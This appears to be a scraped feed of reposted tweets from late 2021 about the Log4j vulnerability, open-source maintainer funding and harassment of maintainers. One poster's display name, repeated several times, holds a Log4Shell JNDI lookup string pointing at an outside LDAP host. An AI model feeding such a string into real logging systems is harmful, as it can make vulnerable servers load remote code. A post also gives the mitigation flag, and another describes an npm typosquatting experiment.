Post details
the log4j “december to remember” event this year features 0% financing on tech debt 😮
Patrick Cable (@patcable)Fri, 17 Dec 2021 15:40 GMT
the log4j “december to remember” event this year features 0% financing on tech debt 😮
Patrick Cable (@patcable)Fri, 17 Dec 2021 15:40 GMT
seems like the entire internet is built on either small open source projects run by a couple folkx for free, and the gigantic cloud infrastructure run by a couple of companies. when either one is borked, the world goes poof
Selena (@selenalarson)Wed, 15 Dec 2021 16:14 GMT
open source maintainers to developers with jobs:
I Am Devloper (@iamdevloper)Wed, 15 Dec 2021 15:55 GMT
this high-profile vulnerability in an open source project is really reinforcing my belief that, to a dominant portion of users, the primary important thing about free software is that it is gratis, rather than libre
cron mom (@sophaskins)Sun, 12 Dec 2021 23:58 GMT
but its not the log4j's responsibility to fix this in a timely fashion they didnt make any promises to any big corps about SLAs or any shit like that, and if there are **consequences** for those corps, that is FINE it might suck, but that's not the dev's responsibilityBeka Valentine (@beka_valentine)Sun, 12 Dec 2021 20:55 GMT
My team could spend an entire year reviewing the code from one “npm install”. I don’t think it’s really feasible to do code review across all OSS components. But funding? Absolutely.
April King 🌀 (@CubicleApril)Mon, 13 Dec 2021 15:11 GMT
Open source is free as in puppy.
Laurie Voss (@seldo)Sun, 12 Dec 2021 16:26 GMT
A rare insightful comment on the orange site: news.ycombinator.com/item?id=295252… "Open source is not broken".Danack (@MrDanack)Sun, 12 Dec 2021 22:11 GMT
Been thinking about the maintainers of log4j2 a ton this weekend. I'm so thankful for open source. While I get to maintain projects with support from my employer - most do this entirely with spare time Maintainers deserve our thanks (and sponsorships!) for their work 🤗🙏Jeff Hollan (@jeffhollan)Sun, 12 Dec 2021 17:16 GMT
Another chronically underfunded OSS library in the news. It’s simple: - Using OSS to make money? Fund it! - Want to see an OSS project advance? Fund it! - Want to help your dependencies succeed so you can hire people experienced in them? Fund them! NORMALIZE FUNDING OSS.twitter.com/benjie/status/…Post details
Why not take 5% of your engineering budget and invest it in the various open source projects you depend on? I'd hazard the returns you'd see over the coming years from this investment would be greater than having spent that same amount on payroll.
Benjie 🐘 (@Benjie)Thu, 18 Jun 2020 13:18 +0000
Benjie 🐘 (@Benjie)Sun, 12 Dec 2021 10:05 GMT
We all agree the status quo is unsustainable. Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession. The thing is, companies need it as much as maintainers do. blog.filippo.io/professional-m…Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile)Sat, 11 Dec 2021 19:22 GMT
This week did not show us weakness in Log4J, Java, or open source. It showed us their relevance and resilience. My🤘🏻to the folks keeping us safe with timely workarounds, fixes, and communications. This was a masterclass in global incident response.Andrew Lee Rubinger (@ALRubinger)Sun, 12 Dec 2021 07:01 GMT
since everyone is talking about log4j/supply chains an experiment years ago i calculated 1-bit offset utf8 strings of the top few hundred npm packages and registered packages under them they received thousands of hits per week from machines trying to download and execute themsuzuha (@dystopiabreaker)Sat, 11 Dec 2021 08:06 GMT
Maintainable open source is not an easily solved problem. And yet most of our tech stacks would shut down if open source code was all of a sudden unavailable.Laurie (@laurieontech)Sat, 11 Dec 2021 22:44 GMT
The Apache Log4j project is maintained by three people who are volunteering their spare time. Please don't be a jerk to them because multi-billion dollar companies are using their tool without even bothering to throw $1,000 their way.
Post details
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. twitter.com/shipilev/statu…Volkan Yazıcı (@yazicivo)Fri, 10 Dec 2021 16:55 GMT
Catalin Cimpanu (@campuscodi)Sat, 11 Dec 2021 17:41 GMT
It took me about 5 minutes to start locally running an open source Ruby project despite the fact that I never touched Ruby on Rails in the past & project itself didn’t have related docs. Now that’s what I call strong external community resources that are easy to find 👏Cake is Kate. Always has been 💫 (@kefimochi)Sat, 11 Dec 2021 23:27 GMT
The market rate of a developer who can maintain a large open source project is at least $300k/yr. (Conservatively, check levels.fyi.) The most I've seen someone rack up on GitHub Sponsors and Patreon is like $1,000/month. You see the problem?Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile)Fri, 10 Dec 2021 22:58 GMT
This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage. "I work on Log4j in my spare time" "always dreamed of working on open source full time" "3 sponsors are funding @rgoers's work: Michael, Glenn, Matt" People, what are we doing.Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile)Fri, 10 Dec 2021 22:58 GMT
orgs: hire an oss strategy person to do this for your entire product portfolio. add in “what does the project need” to the “how is this being funded?” question eng: do this for your tech stackPost details
fun exercise for folks with production code in github: go to the Insights tab in your repo and navigate to the Dependencies page. pick a package that looks interesting and find out how it's funded.shelby spees (@shelbyspees)Sat, 11 Dec 2021 16:34 GMT
p🍐ris (@ParisInBmore)Sat, 11 Dec 2021 16:38 GMT
fun exercise for folks with production code in github: go to the Insights tab in your repo and navigate to the Dependencies page. pick a package that looks interesting and find out how it's funded.shelby spees (@shelbyspees)Sat, 11 Dec 2021 16:34 GMT
This may seem like overkill, but it's really an investment in your company's stability. #OpenSource may reduce many costs of development, but it's not entirely free. Don't find out that the library that's integral to your infrastructure is un(der)-funded when it's too late.Post details
orgs: hire an oss strategy person to do this for your entire product portfolio. add in “what does the project need” to the “how is this being funded?” question eng: do this for your tech stacktwitter.com/shelbyspees/st…p🍐ris (@ParisInBmore)Sat, 11 Dec 2021 16:38 GMT
julia ferraioli (@juliaferraioli)Sat, 11 Dec 2021 17:53 GMT
No one is paying the log4j2 maintainers!? There is a whole page on the responsibilities of a @TheASF "Project Management Committee"... AND NO ONE IS PAYING THEM? apache.org/dev/pmc.html Open Source needs to grow the hell up. Yesterday.Post details
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. twitter.com/shipilev/statu…Volkan Yazıcı (@yazicivo)Fri, 10 Dec 2021 16:55 GMT
Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile)Fri, 10 Dec 2021 22:58 GMT
Sending hugs to Log4J people. This must be an extraordinarily shitty Friday for them.
Post details
If you're running a server with #Log4J, please add the following JVM argument to your command line immediately to protect against a 0-day exploit. -Dlog4j2.formatMsgNoLookups=true lnkd.in/gHmEFJ9w #Java #Security #InfosecBruno Borges (@brunoborges)Fri, 10 Dec 2021 06:07 GMT
Aleksey Shipilëv (@shipilev)Fri, 10 Dec 2021 15:26 GMT
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.
Post details
Sending hugs to Log4J people. This must be an extraordinarily shitty Friday for them. twitter.com/brunoborges/st…Aleksey Shipilëv (@shipilev)Fri, 10 Dec 2021 15:26 GMT
Volkan Yazıcı (@yazicivo)Fri, 10 Dec 2021 16:55 GMT
This is the kind of shit open-source maintainers and visible community members deal with _constantly_. I spend a lot of my time teaching people about Kubernetes and ops stuff, possibly too much time. But I do it on my terms. Maintainers don't owe you training.
Noah Kantrowitz (@kantrn)Wed, 01 Dec 2021 21:20 GMT
So you want for fork Electron. This is not for the faint of heart, but I will tell you what you need to do.Jacob 🌎💧🍁☀️ (@0x606)Wed, 24 Nov 2021 17:59 GMT
Sometimes you go from creator to maintainer to user. This is a valid path and is a healthy one.
Jaana Dogan ヤナ ドガン (@rakyll)Mon, 08 Nov 2021 20:53 GMT
A quick definition of Open-Source
Fabien Potencier (@fabpot)Thu, 04 Nov 2021 08:26 GMT
You mean source available, not Open Source?
Want it to be open source? Great! Go for it. Want it to have all the upsides of open source, and none of the side effects that might make you uncomfortable? Get the fuck right out of town with that. The upside of being open should come with the potential for others to benefit.
Adam Jacob (@adamhjk)Fri, 05 Nov 2021 15:40 GMT
I don’t think people realise just how prevalent this sort of thing is… We get them to the Django board all the time too. We’re all volunteers, and it can take a toll. twitter.com/mikemcquaid/st…Post details
Being an open-source maintainer in 2021: since yesterday I have: - people in my personal DMs calling me a douche for not helping them debug their problems in my DMs - people saying “f*ck you Homebrew” (their censoring, not mine) in my personal email for a new Homebrew releaseMike McQuaid (@MikeMcQuaid)Wed, 27 Oct 2021 11:43 +0000
Aaron Bassett - 🥑🪐 (@aaronbassett)Wed, 27 Oct 2021 13:45 +0000
Still blows my mind how people increasingly think the answer to their OSS problems is to harass and abuse the maintainers (aka who can fix their problems). The abuse gets exponentially worse towards non white/cis/men maintainers. This is the “normal”. OSS is broken. twitter.com/mikemcquaid/st…Post details
Being an open-source maintainer in 2021: since yesterday I have: - people in my personal DMs calling me a douche for not helping them debug their problems in my DMs - people saying “f*ck you Homebrew” (their censoring, not mine) in my personal email for a new Homebrew releaseMike McQuaid (@MikeMcQuaid)Wed, 27 Oct 2021 11:43 +0000
Emily Kager (@EmilyKager)Wed, 27 Oct 2021 18:30 +0000
Being an open-source maintainer in 2021: since yesterday I have: - people in my personal DMs calling me a douche for not helping them debug their problems in my DMs - people saying “f*ck you Homebrew” (their censoring, not mine) in my personal email for a new Homebrew releaseMike McQuaid (@MikeMcQuaid)Wed, 27 Oct 2021 11:43 +0000
I'm very happy to step up - it's a great plugin and I'd love to help continue the great work that @daspilker has done over the years 👏🏽
Thanks to @JamieTanna for stepping up up as a @jenkinsci JobDSL plugin maintainer! And kudos to @daspilker for leading it for almost ten years 🙇 JobDSL is one of the well documented and stable plugins and it is also essential for the configuration as code ecosystem in JenkinsPost details
Just to update on this - I'm a maintainer now, it's been released as 1.78 this morning, and I'll see over the coming weeks if there's anything other high-priority to ship 🚀 (jvt.me/mf2/2021/10/jy…)
Jamie Tanna | www.jvt.me (@JamieTanna)Wed, 27 Oct 2021 09:54 +0000
Oleg Nenashev (@oleg_nenashev)Wed, 27 Oct 2021 10:11 +0000
Thanks to @JamieTanna for stepping up up as a @jenkinsci JobDSL plugin maintainer! And kudos to @daspilker for leading it for almost ten years 🙇 JobDSL is one of the well documented and stable plugins and it is also essential for the configuration as code ecosystem in JenkinsPost details
Just to update on this - I'm a maintainer now, it's been released as 1.78 this morning, and I'll see over the coming weeks if there's anything other high-priority to ship 🚀 (jvt.me/mf2/2021/10/jy…)
Jamie Tanna | www.jvt.me (@JamieTanna)Wed, 27 Oct 2021 09:54 +0000
Oleg Nenashev (@oleg_nenashev)Wed, 27 Oct 2021 10:11 +0000
GitHub isn't Open Source, and it's acquisition by Microsoft was not proof of their commitment to Open Source as a movement. There are other things that indicate a meaningful change in respect of the movement. ASOP is an "Open Source Project" in name and software license only.Matthew S. Wilson (msw) (@_msw_)Sun, 24 Oct 2021 18:15 +0000
Every open source maintainer upon realizing tomorrow is October…
Devon Govett (@devongovett)Fri, 01 Oct 2021 03:02 +0000
Using this
🧗♂️ Matt Holt (@mholt6)Fri, 01 Oct 2021 05:54 +0000
An open source project either dies young as a hero or lives long enough to be horribly mismanaged into the ground by a group of big egos with misaligned incentives.
Jamon 🚜 (@jamonholmgren)Thu, 30 Sep 2021 17:02 +0000
Having worked in open source for a majority of my career now, I can say that the “just send a pull request” meme downplays the cost of software maintenance. Maintainers need to deal with the ramifications of supporting this change when the contributor has moved on #ossDavid Fowler 🇧🇧💉💉 (@davidfowl)Sun, 26 Sep 2021 17:57 +0000
Tips for Reducing Dependency Upgrade Toil with WhiteSource Renovate (5 mins read).
Some tips I've picked up while working with WhiteSource Renovate to keep my projects up-to-date.
Thanks to the entire Jenkins Infra Team for their evening&weekend work to get it fixed as soon as possible! 🙇
Oleg Nenashev (@oleg_nenashev)Sat, 04 Sep 2021 16:55 +0000